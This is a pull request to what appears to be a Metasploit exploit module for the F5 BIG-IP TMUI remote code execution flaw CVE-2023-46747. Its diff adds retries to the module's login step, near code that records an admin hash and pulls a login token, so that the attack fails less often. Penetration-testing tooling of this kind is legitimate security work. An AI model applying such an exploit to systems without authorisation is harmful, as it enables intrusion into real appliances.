### PR TITLE
Fix a stability issue with the module

### DIFF
--- a/modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747.rb
+++ b/modules/exploits/linux/http/f5_bigip_tmui_rce_cve_2023_46747.rb
@@ -103,8 +103,11 @@ class MetasploitModule < Msf::Exploit::Remote
       report_hash('admin', hash)
     end
 
-    res = bigip_api_shared_login
-    fail_with(Failure::UnexpectedReply, 'Failed to login.') unless res&.code == 200
+    logged_in = retry_until_truthy(timeout: 30) do
+      res = bigip_api_shared_login
+      res&.code == 200
+    end
+    fail_with(Failure::UnexpectedReply, 'Failed to login.') unless logged_in
 
     token = res.get_json_document.dig('token', 'token')
     fail_with(Failure::UnexpectedReply, 'Failed to obtain a login token.') if token.blank?


### PR DESCRIPTION
Occasionally the module will fail on login if things are running too quickly. Fix it by retrying like `#update_user_password` does.

## Testing

- [x] Run the module a couple of times and do not see a "Failed to login." error message.